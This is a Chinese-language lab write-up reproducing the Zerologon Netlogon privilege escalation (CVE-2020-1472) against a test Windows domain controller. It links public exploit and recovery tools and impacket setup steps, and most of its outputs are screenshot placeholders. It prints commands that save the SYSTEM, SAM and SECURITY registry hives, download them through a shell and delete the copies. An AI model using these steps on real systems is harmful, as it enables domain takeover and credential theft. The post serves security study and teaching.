CVE-2020-1472

admin 2020年9月17日17:14:00评论191 views字数 969阅读3分13秒阅读模式

0x00 CVE-2020-1472复现


NetLogon 特权提升漏洞

    NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。


环境:


1.攻击机kali2020
2.靶机win2008r2---ip:192.168.124.141---主机名字:dc-01 ---域名:test.com
3.复现工具:https://github.com/dirkjanm/CVE-2020-1472
4.所需环境:python3+impacket包https://github.com/SecureAuthCorp/impacket
5.恢复工具:https://github.com/risksense/zerologon


0x01 复现过程


  1. 下载复现工具,进行检验


CVE-2020-1472


   2.获取hash值


安装impacket包

需要使用如下步骤:

git clonehttps://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令


CVE-2020-1472

获取hash值


CVE-2020-1472

CVE-2020-1472


3.   获取shell


CVE-2020-1472


4.   获取域控的原始NT哈希


先在shell中执行以下命令,获取域控账户的注册表文件

reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.save
reg save HKLMSECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save


CVE-2020-1472

 

在执行以下命令获取原始NT哈希

 

CVE-2020-1472


0x02.恢复


恢复脚本:https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数

 


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月17日17:14:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1472https://cn-sec.com/archives/135899.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息